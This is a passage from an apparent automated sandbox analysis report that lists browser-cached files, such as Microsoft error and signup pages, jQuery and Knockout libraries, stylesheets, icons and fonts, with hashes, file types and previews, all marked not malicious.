SHA-256: A705D1E0916A79B0D6E60C41A9CE301ED95B3FC00E927F940AB27061C208A536
SHA-512: 53C5F2F2B9AD8B555F9AE6644941CF2016108E803EA6AB2C7418E31E66874DEA5A2BC04BE0FA9766E7206617879520E730E9E3E0DE136BAE886C2E786082D622
Malicious: false
Reputation: moderate, very likely benign file
Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\dnserrordiagoff[2]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 1678
Entropy (8bit): 4.566317707595381
Encrypted: false
MD5: 7E81A79F38695E467A49EE41DD24146D
SHA1: 035E110C36BF3072525B05394F73D1BA54D0D316
SHA-256: A705D1E0916A79B0D6E60C41A9CE301ED95B3FC00E927F940AB27061C208A536
SHA-512: 53C5F2F2B9AD8B555F9AE6644941CF2016108E803EA6AB2C7418E31E66874DEA5A2BC04BE0FA9766E7206617879520E730E9E3E0DE136BAE886C2E786082D622
Malicious: false
Reputation: moderate, very likely benign file
Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\ellipsis_white[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 22356
Entropy (8bit): 6.694074336333653
Encrypted: false
MD5: 5CFA4099FDF578C66B0BDD5ED7863EA2
SHA1: F7655793E88D1A769F5CCF472870AB5CD503C597
SHA-256: 17A4AE07EF1009A19AA43AAAB3CBD803CB1E043D92E6700833F0E9DA7DB65403
SHA-512: 6AA8068CC945481D4392D531AD7E5E45F9B8A00ED9064C3D376A4984F33445DE48D283F1A699C870FE97A484EA02C2A65DB9214202C9E7F4816BBA7D4A6131D0
Malicious: false
Reputation: low
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#ffffff" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>623,1.381,5.212,5.212,0,0,1,1.3,3.729,5.257,5.257,0,0,1-1.386,3.83,5.019,5.019,0,0,1-
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquery-3.3.1.min[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 86927
Entropy (8bit): 5.289226719276158
Encrypted: false
Copyright Joe Security LLC 2019 Page 22 of 47
MD5: A09E13EE94D51C524B7E2A728C7D4039
SHA1: 0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
SHA-256: 160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
SHA-512: F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
Malicious: false
Reputation: moderate, very likely benign file
Preview: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquery-3.3.1.min[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines
Size (bytes): 96649
Entropy (8bit): 5.297804550899051
Encrypted: false
MD5: E55ECB02E7376CD010C764107EBD513F
SHA1: FA6D184DF01EC535628DC8FAF38211591BAADFC8
SHA-256: 5776881753B95A0ABE5D1F6EFE3ABE7B83A3265EACCD117DD948E523C044600C
SHA-512: 099C665E1CEE8DF9C5D5C340A14170341BD29E0321875FF08E594B750CFDBF2CA8C9B45B584FCA21F87CBE6CD8A170918CECFF8C9796AAFA3D89F0AA97509ABD
Malicious: false
Reputation: moderate, very likely benign file
Preview: /*!. * jQuery JavaScript Library v1.10.2. * http://jquery.com/. *. * Includes Sizzle.js. * http://sizzlejs.com/. *. * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors. * Released under the MIT license. * http://jquery.org/license. *. * Date: 2013-07-03T13:48Z. */.!function(e,t){function n(e){var t=e.length,n=ct.type(e);return ct.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}function r(e){var t=kt[e]={};return ct.each(e.match(pt)||[],function(e,n){t[n]=!0}),t}function i(e,n,r,i){if(ct.acceptData(e)){var o,a,s=ct.expando,u=e.nodeType,l=u?ct.cache:e,c=u?e[s]:e[s]&&s;if(c&&l[c]&&(i||l[c].data)||r!==t||"string"!=typeof n){return c||(c=u?e[s]=tt.pop()||ct.guid++:s),l[c]||(l[c]=u?{}:{"toJSON":ct.noop}),("object"==typeof n||"function"==typeof n)&&(i?l[c]=ct.extend(l[c],n):l[c].data=ct.extend(l[c].data,n)),a=l[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[ct.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Size (bytes): 284727
Entropy (8bit): 5.445836715201731
Encrypted: false
MD5: DCD7AA5F0622498CCC7149AE551D05C4
SHA1: 793500F4E007A374806281DEEE883BBB025964B6
SHA-256: 00F339738C54CF7FB233C1EC171306FD95F90030B51AB92A2F91030EF7BDF24B
SHA-512: 6B9431E03962B2DEEC78B63BB8A8842A181752F2828F38F5B3807AD40A3BE224E65C9EBF80B1F3C953509C325B861C4F4377B4B9289A4570A30EA4B61AF157C6
Malicious: false
Reputation: low
Preview: /*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------....This file is based on or incorporates material from the projects listedbelow (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. .... * Knockout JavaScript library v3.3.0.. * (c) Steven Sanderson - http://knockoutjs.com/.. * License: MIT (http://www.opensource.org/licenses/mit-license.php)....Provided for Informational Purposes Only....MIT License ....Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the Software)
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\microsoft_logo[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 1269
Entropy (8bit): 4.111137762573903
Encrypted: false
MD5: 96CB8CEA30D947C962FA2CF959F23890
SHA1: FE2C6762A50C9E4B695AD2DA64663E73F98FE890
SHA-256: 5306E406F5B7B320D6CC69ECF511A3B606058844BC163249781986CBD03E3721
SHA-512: 1191A962C945FBFA4CE9A99B51BB1651BE54DDF221896B37B7001323C35E9672035291332AED39918009B93B57F7D1BEDE4C3205DE14B01C4538E7F20C57C1A3
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
Copyright Joe Security LLC 2019 Page 23 of 47
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\script[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines, with no line terminators
Size (bytes): 171715
Entropy (8bit): 5.325926407045175
Encrypted: false
MD5: C3990846C6D6520733D90A210187FEE5
SHA1: 98E8BBE9C67C53BBE501557FDA3E7D44100F2794
SHA-256: ADEED61C97600E999A2773C89A4D906711C6EC77BD5C8493A2F3C10FB357983D
SHA-512: 6F9BF6D86428A781D09B063F89679C5E9ED5AA4E17E249F2F44D1793B6382B1659EADC1CB57321FFF4F49C6FAC38BC03FAF11479115D64F390EED0A7589CC084
Malicious: false
Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function ShowHighLight(n){var t=$("#div"+n).height();$.browser.msie&&parseInt($.browser.version,10)==7?$("#div"+n+" > .highlight").css({width:"0",height:"0","background-color":"white",float:"left","border-top":Math.round(t/2+.3)+"px solid white","border-right":"0.75em solid "+$("#div"+n).css("background-color"),"border-bottom":Math.round(t/2+.3)+"px solid white"}):$("#div"+n+" > .highlight").css({width:"0",height:"0","background-color":"white",float:"left","border-top":t/2+.3+"px solid white","border-right":"0.75em solid "+$("#div"+n).css("background-color"),"border-bottom":t/2+.3+"px solid white"})}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\signup[1].htmProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
Size (bytes): 110160
Entropy (8bit): 5.15728771558402
Encrypted: false
MD5: E83E402C620D96BDC6DC1A8F13A1F798
SHA1: 899E07DA59CD71FBB33C1B6203494F574320F115
SHA-256: 0AFA5CA70FE738B17AEC5D279BE7F491AA248EDEA77D88A5431E3348FD735D98
SHA-512: 17D7D7A9158F94F45D16DC7D24F4CA2DECB894FB752E539FBAF98EDA2872005D85249E25DE06802C3BEAF4E348D3F9F4BF03FDBF4A89FF4AF6B6793CBB8ECEB2
Malicious: false
Preview: .. Copyright (C) Microsoft Corporation. All rights reserved. -->....<!DOCTYPE html>..<html lang="en" xml:lang="en" class="m_ul" dir="ltr" style="">.. <head>.. <link rel="preconnect" href="https://uhf.microsoft.com" >..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<meta http-equiv="x-dns-prefetch-control" content="on">..<link rel="dns-prefetch" href="//uhf.microsoft.com">..<link rel="dns-prefetch" href="//wut.smartscreen.microsoft.com">..<link rel="dns-prefetch" href="//acctcdn.msauth.net">..<link rel="dns-prefetch" href="//acctcdnmsftuswe2.azureedge.net">..<link rel="dns-prefetch" href="//acctcdnvzeuno.azureedge.net">.... <title>Microsoft account</title>.. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"/><meta name="format-detection"
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\51-6d3a1e[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines
Size (bytes): 149391
Entropy (8bit): 5.055058698445385
Encrypted: false
MD5: F375A2C25F0E94DB19E607E07F2C4B47
SHA1: 38949C3F25DDD1E56DE5501FF84F4A6D07F2A6BF
SHA-256: 28C68FD8C3D21374261E3A1CD672AA551F01C0B04C2F49C1B53DF95F6D1CDD7B
SHA-512: DF7A83E40093BAD3E594CFA991FFBC7DDB36AAD64FA4F46F4C36EBD4ACDF2BB965432D73A67138B0EEDC18B6FD396369EF0B4DD66CAFBA181CD149725A4A8DF3
Malicious: false
Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 100774
Entropy (8bit): 5.305482238693464
Encrypted: false
MD5: 6F11225E02372CB349FA7B9CE3E5EAC0
SHA1: A6773684CB3501A34BDC560A3173262E879FF3A8
SHA-256: 21CC48423EE47207382CC9C1C3885913079BE17805E6FF81E76E0E7165CA32CD
SHA-512: 1AD8016439C16B967BAB4BB3A580B0A0A6696253C29B49A45C096BDD93F6E860F97084D188181A68C5D5B09482042966681AD8CD0E6E81564FD594B507570C7D
Malicious: false
Copyright Joe Security LLC 2019 Page 24 of 47
Preview: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file isbased on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 TwiInc..Permission is hereby granted, free of charge, to any person
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\convergedbg_small_v2_Z9GCPpM7FVE8hxRSZUez6g2[1].jpgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: JPEG image data, baseline, precision 8, 50x28, frames 3
Size (bytes): 286254
Entropy (8bit): 7.961526577350427
Encrypted: false
MD5: ABA046173F6291AF45F08FD4FBC6386D
SHA1: 453FF1D21D7998626B0E9A107ED9623BAAC998D9
SHA-256: D775B46CE0CEA4773C163A56DC52DAA5DDBCE0BAC7D24B57B8DAC50A66419989
SHA-512: 1F2757149A691BD5338541599FC2980934433B588598FCF8254C9E9D6B15BD59902CF4A2190CF46906404E5ACF54C500A89DA9AF12D4C841827446DBADD31351
Malicious: false
Preview: .....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\dropdown_caret_KXSZjGsyILZaoTf0sI9X-A2[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 224
Entropy (8bit): 5.066130335315081
Encrypted: false
MD5: 2974998C6B3220B65AA137F4B08F57F8
SHA1: F4F08DA689179DE68EE40CD12ECDCC5AC54B3979
SHA-256: 96D52BD03E244A44931A541A807067792D638DD29EC14A87A78F2BE85D12D19A
SHA-512: 6B4F2439CA99109A7C97828E5972A8E7C7FCA3745B2FB4738EBD9329A99234A8CD3BC4C0C48B5BAA917D4BAA64CDAEB5D74456DEFDDDA3E07FAA803283BE0287
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="36" height="36" viewBox="0 0 36 36"><title>assets</title><path d="M18,22.484l-8-8,.969-.968L18,20.547l7.031-7.031.969.968-8,8Z"/><rect width="36" height="36" fill="none"/></svg>
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\errorPageStrings[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 4720
Entropy (8bit): 5.164796203267696
Encrypted: false
MD5: D65EC06F21C379C87040B83CC1ABAC6B
SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious: false
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\jquery-1.11.2.min[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 95931
Entropy (8bit): 5.394232486761965
Encrypted: false
MD5: 5790EAD7AD3BA27397AEDFA3D263B867
SHA1: 8130544C215FE5D1EC081D83461BF4A711E74882
SHA-256: 2ECD295D295BEC062CEDEBE177E54B9D6B19FC0A841DC5C178C654C9CCFF09C0
SHA-512: 781ACEDC99DE4CE8D53D9B43A158C645EAB1B23DFDFD6B57B3C442B11ACC4A344E0D5B0067D4B78BB173ABBDED75FB91C410F2B5A58F71D438AA6266D048D98A
Malicious: false
Copyright Joe Security LLC 2019 Page 25 of 47
Preview: /*! jQuery v1.11.2 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.2",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\jquery-1.11.2.min[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\latest[1].eotProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: Embedded OpenType (EOT), Segoe UI Semibold family
Size (bytes): 30643
Entropy (8bit): 7.976822258863597
Encrypted: false
MD5: E812BA8B7E2A657F2B70CFACE93C7682
SHA1: 2F02CDDBB483F9B11BBBE74C3CA917A4C345FBAD
SHA-256: 3330C1DEAC468874238DD0C6BF902179A8731EDA8A208C7D01DAC0AB1EAE1BC9
SHA-512: 354B2DB12BC1D67F26F94352B0B663DAD64C46C107454FC19CFEA01C54BB09340BC26C06DE1B96FF826F5287CE246A6317722BAE41B72B63BA86FDAF844BA94E
Malicious: false
Preview: .w...v......................X.....LP#...B.............. ..........................".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2...".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d........H.P..lb.7^......U.D.-..iu...:4P\..GLFM.Y.#?.;..-...~}_).z{.rmD.1".$.....{.t.....=...!cK...%.~.....g........j.9S....6. ..n..V.]pz...e.....#X...=,.p.F..6&.VR...k$~J..n....7.......K.8..T.....x..J......#.J.XaQ.Q%_{3..xr.... 0Dm...k..Ep..........>..?Pk!KB..C...Q.q..1=6<,.S.F.&B..J.....ya2b."S.......6.2.......H......*..09A...Tb/.&.d..#.E.:.E.(..I5.M..444d.1........K..l...l.O..VBb...:..:b..Mh.'=4.d/..o.k.mMm........bx..!..S.@E.....>@:..k.JCas..7."..uG3hR.h..w..8W>.4.........pX....J..a....}.Y......(>H^=.`=.mg*.!.....w'...J.<.ob..3A .../.....5%.'....XS0a......I.Ia....a...=..g..........{V1+.."_)7$2 O..!bb.=..|.s.1..2qm..#.O......+E(I..1....EgQ.....E)R.m.?.8.q...J.G.@!f..n.F.r#..(..2p.?.9.8..?.d]..s..0.9.f..A...r.iq....x.g.aO....S.....R0i..BT.yl.".<k...:&Ja.\.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\latest[2].eot
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: Embedded OpenType (EOT), Segoe UI Light family
Size (bytes): 69595
Entropy (8bit): 7.992327121754015
Encrypted: true
MD5: 72010CDB678FBB4CAB5FE12406D7F5EF
SHA1: E7F06A3C0A88250845E14310A24CE209A7695BBC
SHA-256: 22BA31E135F725FF091E11C15EC3103465E3CB5FDCC736413CBBE2F441054638
SHA-512: 84B5E6BC5763A81592F3BE4AB08864540CCD9699DBD3090A4382AB458D191901D9889D8753CDC2952C3F2DCEF954F11E152C330D0915DFC3571221653107BA3D
Malicious: false
Preview: .n...m............................LP#...B.............. ............................S.e.g.o.e. .U.I. .L.i.g.h.t.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2.....S.e.g.o.e. .U.I. .L.i.g.h.t..........K..e..66......U.D.-..iu...4P\..GLFM..C?.;..-...~|...P..\.(..)RI.....>.>..CE..SsV.jPR...H.......].R..&.n.hT.......x.....q .......wA[....F.........c.".......Zed..>.?...`..3...B..W....R....F.j....v..'?.5.k^........+..a...).._].x.#QSi.....|<t....k.;..Hv1.G...L$.9....5.t.:...V.Y.......|[email protected]`..2.Z.0....2`.FR.MF8.x....GP0..$:.....PYm.22..."S."1.*j[=.=.mR.*.......j....&.4...k..][email protected]$......"y..C..g7..k.B*...V..F\...G.m.jK ...O....b.Qlo...!.N.V....t.[[email protected].."....R_i.4.$j.P..U....u9...<..6..4%........9`.....S...N.Y..L..B$2\.E.vhe...n..h..5..Z..K?.H..S...2..=R..x.....EX.2......$."....It8..z.+.h ..$.2*T....}Z../....p..b0ae.qq.(-v1..E.!.l".a..p.).;..8t..7..^..W...4A.D\eOb$......b.NI.Pe.#$.O38....,....g..&|...B{...].....9..u.8..~Y...3.X..ff.,.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\mwfmdl2-v3.07[1].woffProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: Web Open Font Format, TrueType, length 22376, version 0.0
Size (bytes): 22376
Entropy (8bit): 7.978063740714443
Encrypted: false
MD5: DAE68C4A8AAC30A0C75731AA3C7553F3
SHA1: 4E662B5F83B7F10E297A825072AAF87EE01E9FCC
SHA-256: 7F31CBB16DD8190854789BD1B43F15AE60940FB79AFBB7CFBEF664E12F8A247C
SHA-512: 20433B4530D557D360F9ED51B1DD1DE0C6EEC97B33E880D45898FBAF308A51A73104D04293CDA1959ABCA5C787BB0B2AE50DBA2576CC12D2816ADC74CD9B27E8
Malicious: false
